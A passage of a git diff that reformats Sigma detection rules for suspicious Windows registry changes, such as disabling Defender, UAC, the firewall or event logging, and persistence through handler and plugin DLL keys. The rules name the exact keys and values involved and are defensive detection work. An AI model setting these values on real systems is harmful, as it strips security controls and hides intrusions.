1321dc4e-a1fe-481d-a016-52c45f0c8b4f - type: derived + - id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f + type: derived status: test description: Detects the Setting of Windows Defender Exclusions references: diff --git a/sigma/builtin/registry/registry_set/registry_set_desktop_background_change.yml b/sigma/builtin/registry/registry_set/registry_set_desktop_background_change.yml index 94eea8ab4..4b0071755 100644 --- a/sigma/builtin/registry/registry_set/registry_set_desktop_background_change.yml +++ b/sigma/builtin/registry/registry_set/registry_set_desktop_background_change.yml @@ -1,16 +1,12 @@ title: Potentially Suspicious Desktop Background Change Via Registry id: 85b88e05-dadc-430b-8a9e-53ff1cd30aae related: - - id: 8cbc9475-8d05-4e27-9c32-df960716c701 - type: similar + - id: 8cbc9475-8d05-4e27-9c32-df960716c701 + type: similar status: experimental -description: 'Detects regsitry value settings that would replace the user''s desktop - background. - - This is a common technique used by malware to change the desktop background to - a ransom note or other image. - - ' +description: | + Detects regsitry value settings that would replace the user's desktop background. + This is a common technique used by malware to change the desktop background to a ransom note or other image. references: - https://www.attackiq.com/2023/09/20/emulating-rhysida/ - https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/ @@ -46,11 +42,10 @@ detection: ObjectName|endswith: \WallpaperStyle NewValue: '2' filter_main_svchost: + # Note: Excluding GPO changes ProcessName|endswith: \svchost.exe - condition: registry_set and (selection_keys and 1 of selection_values_* and not - 1 of filter_main_*) + condition: registry_set and (selection_keys and 1 of selection_values_* and not 1 of filter_main_*) falsepositives: - - Administrative scripts that change the desktop background to a company logo - or other image. + - Administrative scripts that change the desktop background to a company logo or other image. level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml b/sigma/builtin/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml index 282e9dffd..f10ccbf32 100644 --- a/sigma/builtin/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml +++ b/sigma/builtin/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml @@ -1,10 +1,7 @@ title: Hypervisor Enforced Code Integrity Disabled id: 8b7273a4-ba5d-4d8a-b04f-11f2900d043a status: experimental -description: Detects changes to the HypervisorEnforcedCodeIntegrity registry key and - the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced - Code Integrity feature. This allows an attacker to load unsigned and untrusted - code to be run in the kernel +description: Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel references: - https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/ - https://github.com/redcanaryco/atomic-red-team/blob/04e487c1828d76df3e834621f4f893ea756d5232/atomics/T1562.001/T1562.001.md#atomic-test-43---disable-hypervisor-enforced-code-integrity-hvci @@ -22,7 +19,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1905' + OperationType: '%%1905' ObjectName|endswith: - \Microsoft\Windows\DeviceGuard\HypervisorEnforcedCodeIntegrity - \Control\DeviceGuard\HypervisorEnforcedCodeIntegrity diff --git a/sigma/builtin/registry/registry_set/registry_set_dhcp_calloutdll.yml b/sigma/builtin/registry/registry_set/registry_set_dhcp_calloutdll.yml index b0c9a27b3..91bf853b1 100644 --- a/sigma/builtin/registry/registry_set/registry_set_dhcp_calloutdll.yml +++ b/sigma/builtin/registry/registry_set/registry_set_dhcp_calloutdll.yml @@ -1,9 +1,7 @@ title: DHCP Callout DLL Installation id: 9d3436ef-9476-4c43-acca-90ce06bdf33a status: test -description: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled - parameter in Registry, which can be used to execute code in context of the DHCP - server (restart required) +description: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required) references: - https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html - https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx diff --git a/sigma/builtin/registry/registry_set/registry_set_disable_administrative_share.yml b/sigma/builtin/registry/registry_set/registry_set_disable_administrative_share.yml index 3edb2f9b6..d0b2ee419 100644 --- a/sigma/builtin/registry/registry_set/registry_set_disable_administrative_share.yml +++ b/sigma/builtin/registry/registry_set/registry_set_disable_administrative_share.yml @@ -1,9 +1,7 @@ title: Disable Administrative Share Creation at Startup id: c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e status: test -description: Administrative shares are hidden network shares created by Microsoft - Windows NT operating systems that grant system administrators remote access to - every disk volume on a network-connected system +description: Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup author: frack113 diff --git a/sigma/builtin/registry/registry_set/registry_set_disable_autologger_sessions.yml b/sigma/builtin/registry/registry_set/registry_set_disable_autologger_sessions.yml index 0299359c1..8d30f67c7 100644 --- a/sigma/builtin/registry/registry_set/registry_set_disable_autologger_sessions.yml +++ b/sigma/builtin/registry/registry_set/registry_set_disable_autologger_sessions.yml @@ -1,8 +1,7 @@ title: Potential AutoLogger Sessions Tampering id: f37b4bce-49d0-4087-9f5b-58bffda77316 status: experimental -description: Detects tampering with autologger trace sessions which is a technique - used by attackers to disable logging +description: Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging references: - https://twitter.com/MichalKoczwara/status/1553634816016498688 - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ diff --git a/sigma/builtin/registry/registry_set/registry_set_disable_defender_firewall.yml b/sigma/builtin/registry/registry_set/registry_set_disable_defender_firewall.yml index 9f12bfaba..3fad34dbc 100644 --- a/sigma/builtin/registry/registry_set/registry_set_disable_defender_firewall.yml +++ b/sigma/builtin/registry/registry_set/registry_set_disable_defender_firewall.yml @@ -1,8 +1,7 @@ title: Disable Microsoft Defender Firewall via Registry id: 974515da-6cc5-4c95-ae65-f97f9150ec7f status: test -description: Adversaries may disable or modify system firewalls in order to bypass - controls limiting network usage +description: Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry author: frack113 @@ -19,6 +18,9 @@ detection: EventID: 4657 Channel: Security selection: + # HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\EnableFirewall + # HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall + # HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall ObjectName|startswith: \REGISTRY\MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\ ObjectName|endswith: \EnableFirewall NewValue: DWORD (0x00000000) diff --git a/sigma/builtin/registry/registry_set/registry_set_disable_function_user.yml b/sigma/builtin/registry/registry_set/registry_set_disable_function_user.yml index ce87184e3..ae0a184a2 100644 --- a/sigma/builtin/registry/registry_set/registry_set_disable_function_user.yml +++ b/sigma/builtin/registry/registry_set/registry_set_disable_function_user.yml @@ -1,8 +1,7 @@ title: Disable Internal Tools or Feature in Registry id: e2482f8d-3443-4237-b906-cc145d87a076 status: experimental -description: Detects registry modifications that change features of internal Windows - tools (malware like Agent Tesla uses this technique) +description: Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md - https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions diff --git a/sigma/builtin/registry/registry_set/registry_set_disable_macroruntimescanscope.yml b/sigma/builtin/registry/registry_set/registry_set_disable_macroruntimescanscope.yml index 635434cfc..6d9f091ac 100644 --- a/sigma/builtin/registry/registry_set/registry_set_disable_macroruntimescanscope.yml +++ b/sigma/builtin/registry/registry_set/registry_set_disable_macroruntimescanscope.yml @@ -1,7 +1,6 @@ title: Disable Macro Runtime Scan Scope id: ab871450-37dc-4a3a-997f-6662aa8ae0f1 -description: Detects tampering with the MacroRuntimeScanScope registry key to disable - runtime scanning of enabled macros +description: Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros status: experimental date: 2022/10/25 modified: 2023/08/17 diff --git a/sigma/builtin/registry/registry_set/registry_set_disable_security_center_notifications.yml b/sigma/builtin/registry/registry_set/registry_set_disable_security_center_notifications.yml index b3bfa95ba..958ca9e17 100644 --- a/sigma/builtin/registry/registry_set/registry_set_disable_security_center_notifications.yml +++ b/sigma/builtin/registry/registry_set/registry_set_disable_security_center_notifications.yml @@ -1,8 +1,7 @@ title: Disable Windows Security Center Notifications id: 3ae1a046-f7db-439d-b7ce-b8b366b81fa6 status: experimental -description: Detect set UseActionCenterExperience to 0 to disable the Windows security - center notification +description: Detect set UseActionCenterExperience to 0 to disable the Windows security center notification references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md author: frack113 diff --git a/sigma/builtin/registry/registry_set/registry_set_disable_system_restore.yml b/sigma/builtin/registry/registry_set/registry_set_disable_system_restore.yml index d38614688..906fb8e52 100644 --- a/sigma/builtin/registry/registry_set/registry_set_disable_system_restore.yml +++ b/sigma/builtin/registry/registry_set/registry_set_disable_system_restore.yml @@ -1,8 +1,7 @@ title: Registry Disable System Restore id: 5de03871-5d46-4539-a82d-3aa992a69a83 status: experimental -description: Detects the modification of the registry to disable a system restore - on the computer +description: Detects the modification of the registry to disable a system restore on the computer references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry author: frack113 diff --git a/sigma/builtin/registry/registry_set/registry_set_disable_uac_registry.yml b/sigma/builtin/registry/registry_set/registry_set_disable_uac_registry.yml index 06234d376..a18995276 100644 --- a/sigma/builtin/registry/registry_set/registry_set_disable_uac_registry.yml +++ b/sigma/builtin/registry/registry_set/registry_set_disable_uac_registry.yml @@ -1,9 +1,7 @@ title: Disable UAC Using Registry id: 48437c39-9e5f-47fb-af95-3d663c3f2919 status: experimental -description: Detects when an attacker tries to disable User Account Control (UAC) - by changing its registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA - from 1 to 0 +description: Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0 references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-8---disable-uac-using-regexe author: frack113 diff --git a/sigma/builtin/registry/registry_set/registry_set_disable_windows_defender_service.yml b/sigma/builtin/registry/registry_set/registry_set_disable_windows_defender_service.yml index 81421baeb..c4980d0af 100644 --- a/sigma/builtin/registry/registry_set/registry_set_disable_windows_defender_service.yml +++ b/sigma/builtin/registry/registry_set/registry_set_disable_windows_defender_service.yml @@ -1,12 +1,11 @@ title: Windows Defender Service Disabled id: e1aa95de-610a-427d-b9e7-9b46cfafbe6a status: experimental -description: Detects when an attacker or tool disables the Windows Defender service - (WinDefend) via the registry +description: Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry references: - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ - https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105 -author: "J\xE1n Tren\u010Dansk\xFD, frack113, AlertIQ, Nasreddine Bencherchali" +author: Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali date: 2022/08/01 modified: 2023/08/17 tags: diff --git a/sigma/builtin/registry/registry_set/registry_set_disable_winevt_logging.yml b/sigma/builtin/registry/registry_set/registry_set_disable_winevt_logging.yml index 7765ba0fb..2bb9a4b7d 100644 --- a/sigma/builtin/registry/registry_set/registry_set_disable_winevt_logging.yml +++ b/sigma/builtin/registry/registry_set/registry_set_disable_winevt_logging.yml @@ -1,8 +1,7 @@ title: Disable Windows Event Logging Via Registry id: 2f78da12-f7c7-430b-8b19-a28f269b77a3 status: experimental -description: Detects tampering with the "Enabled" registry key in order to disable - Windows logging of a Windows event channel +description: Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel references: - https://twitter.com/WhichbufferArda/status/1543900539280293889 - https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp @@ -39,14 +38,12 @@ detection: filter_main_trusted_installer: ProcessName: C:\Windows\servicing\TrustedInstaller.exe ObjectName|contains: \Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Compat-Appraiser - filter_optional_empty: + filter_optional_empty: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later ProcessName: '' - filter_optional_null: - ProcessName: null - condition: registry_set and (selection and not 1 of filter_main_* and not 1 of - filter_optional_*) + filter_optional_null: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later + ProcessName: + condition: registry_set and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Rare falsepositives may occur from legitimate administrators disabling specific - event log for troubleshooting + - Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting level: high ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml b/sigma/builtin/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml index 32568984c..6f210e7be 100644 --- a/sigma/builtin/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml +++ b/sigma/builtin/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml @@ -18,8 +18,7 @@ detection: EventID: 4657 Channel: Security selection: - ObjectName|contains: SOFTWARE\Policies\Microsoft\Windows Defender Security - Center\App and Browser protection\DisallowExploitProtectionOverride + ObjectName|contains: SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection\DisallowExploitProtectionOverride NewValue: DWORD (00000001) condition: registry_set and selection falsepositives: diff --git a/sigma/builtin/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml b/sigma/builtin/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml index c938242db..b3febfb16 100644 --- a/sigma/builtin/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml +++ b/sigma/builtin/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml @@ -1,8 +1,7 @@ title: Disabled Windows Defender Eventlog id: fcddca7c-b9c0-4ddf-98da-e1e2d18b0157 status: experimental -description: Detects the disabling of the Windows Defender eventlog as seen in relation - to Lockbit 3.0 infections +description: Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections references: - https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2 author: Florian Roth (Nextron Systems) @@ -19,12 +18,10 @@ detection: EventID: 4657 Channel: Security selection: - ObjectName|contains: \Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows - Defender/Operational\Enabled + ObjectName|contains: \Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational\Enabled NewValue: DWORD (0x00000000) condition: registry_set and selection falsepositives: - - Other Antivirus software installations could cause Windows to disable that eventlog - (unknown) + - Other Antivirus software installations could cause Windows to disable that eventlog (unknown) level: high ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml b/sigma/builtin/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml index 70e9a6341..2622fb734 100644 --- a/sigma/builtin/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml +++ b/sigma/builtin/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml @@ -20,10 +20,10 @@ detection: selection: ObjectName|contains: \Microsoft\Windows Defender\Features\TamperProtection NewValue: DWORD (0x00000000) - filter_msmpeng_client: + filter_msmpeng_client: # only disabled temporarily during updates ProcessName|startswith: C:\ProgramData\Microsoft\Windows Defender\Platform\ ProcessName|endswith: \MsMpEng.exe - filter_msmpeng_domain_controller: + filter_msmpeng_domain_controller: # only disabled temporarily during updates ProcessName: C:\Program Files\Windows Defender\MsMpEng.exe condition: registry_set and (selection and not 1 of filter_*) falsepositives: diff --git a/sigma/builtin/registry/registry_set/registry_set_disallowrun_execution.yml b/sigma/builtin/registry/registry_set/registry_set_disallowrun_execution.yml index 0279a440d..5305b4aaa 100644 --- a/sigma/builtin/registry/registry_set/registry_set_disallowrun_execution.yml +++ b/sigma/builtin/registry/registry_set/registry_set_disallowrun_execution.yml @@ -1,8 +1,7 @@ title: Add DisallowRun Execution to Registry id: 275641a5-a492-45e2-a817-7c81e9d9d3e9 status: experimental -description: Detect set DisallowRun to 1 to prevent user running specific computer - program +description: Detect set DisallowRun to 1 to prevent user running specific computer program references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md author: frack113 diff --git a/sigma/builtin/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml b/sigma/builtin/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml index f5cac2bea..854261c13 100644 --- a/sigma/builtin/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml +++ b/sigma/builtin/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml @@ -1,16 +1,13 @@ title: Persistence Via Disk Cleanup Handler - Autorun id: d4e2745c-f0c6-4bde-a3ab-b553b3f693cc status: experimental -description: "Detects when an attacker modifies values of the Disk Cleanup Handler\ - \ in the registry to achieve persistence via autorun.\nThe disk cleanup manager\ - \ is part of the operating system.\nIt displays the dialog box [\u2026] The user\ - \ has the option of enabling or disabling individual handlers by selecting or\ - \ clearing their check box in the disk cleanup manager's UI.\nAlthough Windows\ - \ comes with a number of disk cleanup handlers, they aren't designed to handle\ - \ files produced by other applications.\nInstead, the disk cleanup manager is\ - \ designed to be flexible and extensible by enabling any developer to implement\ - \ and register their own disk cleanup handler.\nAny developer can extend the available\ - \ disk cleanup services by implementing and registering a disk cleanup handler.\n" +description: | + Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun. + The disk cleanup manager is part of the operating system. + It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. + Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. + Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. + Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. references: - https://persistence-info.github.io/Data/diskcleanuphandler.html - https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/ @@ -29,6 +26,7 @@ detection: root: ObjectName|contains: \SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\ selection_autorun: + # Launching PreCleanupString / CleanupString programs w/o gui, i.e. while using e.g. /autoclean ObjectName|contains: \Autorun NewValue: DWORD (0x00000001) selection_pre_after: @@ -36,6 +34,7 @@ detection: - \CleanupString - \PreCleanupString NewValue|contains: + # Add more as you see fit - cmd - powershell - rundll32 diff --git a/sigma/builtin/registry/registry_set/registry_set_dns_over_https_enabled.yml b/sigma/builtin/registry/registry_set/registry_set_dns_over_https_enabled.yml index aeb18904e..72fea60e2 100644 --- a/sigma/builtin/registry/registry_set/registry_set_dns_over_https_enabled.yml +++ b/sigma/builtin/registry/registry_set/registry_set_dns_over_https_enabled.yml @@ -1,15 +1,10 @@ title: DNS-over-HTTPS Enabled by Registry id: 04b45a8a-d11d-49e4-9acc-4a1b524407a5 status: test -description: 'Detects when a user enables DNS-over-HTTPS. - - This can be used to hide internet activity or be used to hide the process of exfiltrating - data. - - With this enabled organization will lose visibility into data such as query type, - response and originating IP that are used to determine bad actors. - - ' +description: | + Detects when a user enables DNS-over-HTTPS. + This can be used to hide internet activity or be used to hide the process of exfiltrating data. + With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors. references: - https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html - https://github.com/elastic/detection-rules/issues/1371 diff --git a/sigma/builtin/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml b/sigma/builtin/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml index 13806681e..b43856f4b 100644 --- a/sigma/builtin/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml +++ b/sigma/builtin/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml @@ -1,14 +1,12 @@ title: New DNS ServerLevelPluginDll Installed id: e61e8a88-59a9-451c-874e-70fcc9740d67 related: - - id: cbe51394-cd93-4473-b555-edf0144952d9 - type: derived - - id: f63b56ee-3f79-4b8a-97fb-5c48007e8573 - type: derived + - id: cbe51394-cd93-4473-b555-edf0144952d9 + type: derived + - id: f63b56ee-3f79-4b8a-97fb-5c48007e8573 + type: derived status: experimental -description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll - parameter in registry, which can be used to execute code in context of the DNS - server (restart required) +description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) references: - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 - https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html diff --git a/sigma/builtin/registry/registry_set/registry_set_dot_net_etw_tamper.yml b/sigma/builtin/registry/registry_set/registry_set_dot_net_etw_tamper.yml index 5b245b922..11ca87668 100644 --- a/sigma/builtin/registry/registry_set/registry_set_dot_net_etw_tamper.yml +++ b/sigma/builtin/registry/registry_set/registry_set_dot_net_etw_tamper.yml @@ -1,8 +1,8 @@ title: ETW Logging Disabled In .NET Processes - Sysmon Registry id: bf4fc428-dcc3-4bbd-99fe-2422aeee2544 related: - - id: a4c90ea1-2634-4ca0-adbb-35eae169b6fc - type: similar + - id: a4c90ea1-2634-4ca0-adbb-35eae169b6fc + type: similar status: test description: Potential adversaries stopping ETW providers recording loaded .NET assemblies. references: @@ -39,7 +39,7 @@ detection: - \COMPlus_ETWEnabled - \COMPlus_ETWFlags NewValue: - - 0 + - 0 # For REG_SZ type - DWORD (0x00000000) condition: registry_set and (1 of selection_*) falsepositives: diff --git a/sigma/builtin/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml b/sigma/builtin/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml index 4155f2796..5c75f5f98 100644 --- a/sigma/builtin/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml +++ b/sigma/builtin/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml @@ -1,8 +1,7 @@ title: Enabling COR Profiler Environment Variables id: ad89044a-8f49-4673-9a55-cbd88a1b374f status: test -description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and - "cor_profiler" variables being set and configured. +description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured. references: - https://twitter.com/jamieantisocial/status/1304520651248668673 - https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors diff --git a/sigma/builtin/registry/registry_set/registry_set_enabling_turnoffcheck.yml b/sigma/builtin/registry/registry_set/registry_set_enabling_turnoffcheck.yml index ce6b09221..58dee8248 100644 --- a/sigma/builtin/registry/registry_set/registry_set_enabling_turnoffcheck.yml +++ b/sigma/builtin/registry/registry_set/registry_set_enabling_turnoffcheck.yml @@ -1,8 +1,7 @@ title: Scripted Diagnostics Turn Off Check Enabled - Registry id: 7d995e63-ec83-4aa3-89d5-8a17b5c87c86 status: experimental -description: Detects enabling TurnOffCheck which can be used to bypass defense of - MSDT Follina vulnerability +description: Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability references: - https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw author: Christopher Peacock @securepeacock, SCYTHE @scythe_io diff --git a/sigma/builtin/registry/registry_set/registry_set_evtx_file_key_tamper.yml b/sigma/builtin/registry/registry_set/registry_set_evtx_file_key_tamper.yml index 790e73329..f23a5dff8 100644 --- a/sigma/builtin/registry/registry_set/registry_set_evtx_file_key_tamper.yml +++ b/sigma/builtin/registry/registry_set/registry_set_evtx_file_key_tamper.yml @@ -1,9 +1,7 @@ title: Potential EventLog File Location Tampering id: 0cb8d736-995d-4ce7-a31e-1e8d452a1459 status: experimental -description: Detects tampering with EventLog service "file" key. In order to change - the default location of an Evtx file. This technique is used to tamper with log - collection and alerting +description: Detects tampering with EventLog service "file" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting references: - https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key author: D3F7A5105 diff --git a/sigma/builtin/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml b/sigma/builtin/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml index 4d1216b19..095650d22 100644 --- a/sigma/builtin/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml +++ b/sigma/builtin/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml @@ -1,8 +1,7 @@ title: Suspicious Application Allowed Through Exploit Guard id: 42205c73-75c8-4a63-9db1-e3782e06fda0 status: experimental -description: Detects applications being added to the "allowed applications" list of - exploit guard in order to bypass controlled folder settings +description: Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings references: - https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/ author: Nasreddine Bencherchali (Nextron Systems) @@ -19,8 +18,7 @@ detection: EventID: 4657 Channel: Security selection_key: - ObjectName|contains: SOFTWARE\Microsoft\Windows Defender\Windows Defender - Exploit Guard\Controlled Folder Access\AllowedApplications + ObjectName|contains: SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\AllowedApplications selection_paths: ObjectName|contains: - \Users\Public\ diff --git a/sigma/builtin/registry/registry_set/registry_set_fax_change_service_user.yml b/sigma/builtin/registry/registry_set/registry_set_fax_change_service_user.yml index 80ca3963f..f5fec8a6f 100644 --- a/sigma/builtin/registry/registry_set/registry_set_fax_change_service_user.yml +++ b/sigma/builtin/registry/registry_set/registry_set_fax_change_service_user.yml @@ -1,8 +1,7 @@ title: Change User Account Associated with the FAX Service id: e3fdf743-f05b-4051-990a-b66919be1743 status: test -description: Detect change of the user account associated with the FAX service to - avoid the escalation problem. +description: Detect change of the user account associated with the FAX service to avoid the escalation problem. references: - https://twitter.com/dottor_morte/status/1544652325570191361 - https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf diff --git a/sigma/builtin/registry/registry_set/registry_set_file_association_exefile.yml b/sigma/builtin/registry/registry_set/registry_set_file_association_exefile.yml index 5dfb49698..e4a53b4e6 100644 --- a/sigma/builtin/registry/registry_set/registry_set_file_association_exefile.yml +++ b/sigma/builtin/registry/registry_set/registry_set_file_association_exefile.yml @@ -1,8 +1,7 @@ title: New File Association Using Exefile id: 44a22d59-b175-4f13-8c16-cbaef5b581ff status: test -description: Detects the abuse of the exefile handler in new file association. Used - for bypass of security products. +description: Detects the abuse of the exefile handler in new file association. Used for bypass of security products. references: - https://twitter.com/mrd0x/status/1461041276514623491 author: Andreas Hunkeler (@Karneades) diff --git a/sigma/builtin/registry/registry_set/registry_set_hangs_debugger_persistence.yml b/sigma/builtin/registry/registry_set/registry_set_hangs_debugger_persistence.yml index caee0fb71..71a5de5bd 100644 --- a/sigma/builtin/registry/registry_set/registry_set_hangs_debugger_persistence.yml +++ b/sigma/builtin/registry/registry_set/registry_set_hangs_debugger_persistence.yml @@ -1,8 +1,7 @@ title: Add Debugger Entry To Hangs Key For Persistence id: 833ef470-fa01-4631-a79b-6f291c9ac498 status: experimental -description: Detects when an attacker adds a new "Debugger" value to the "Hangs" key - in order to achieve persistence which will get invoked when an application crashes +description: Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes references: - https://persistence-info.github.io/Data/wer_debugger.html - https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/ diff --git a/sigma/builtin/registry/registry_set/registry_set_hhctrl_persistence.yml b/sigma/builtin/registry/registry_set/registry_set_hhctrl_persistence.yml index 8eb8779be..152c39769 100644 --- a/sigma/builtin/registry/registry_set/registry_set_hhctrl_persistence.yml +++ b/sigma/builtin/registry/registry_set/registry_set_hhctrl_persistence.yml @@ -1,8 +1,7 @@ title: Persistence Via Hhctrl.ocx id: f10ed525-97fe-4fed-be7c-2feecca941b1 status: experimental -description: Detects when an attacker modifies the registry value of the "hhctrl" - to point to a custom binary +description: Detects when an attacker modifies the registry value of the "hhctrl" to point to a custom binary references: - https://persistence-info.github.io/Data/hhctrl.html - https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/ diff --git a/sigma/builtin/registry/registry_set/registry_set_hide_file.yml 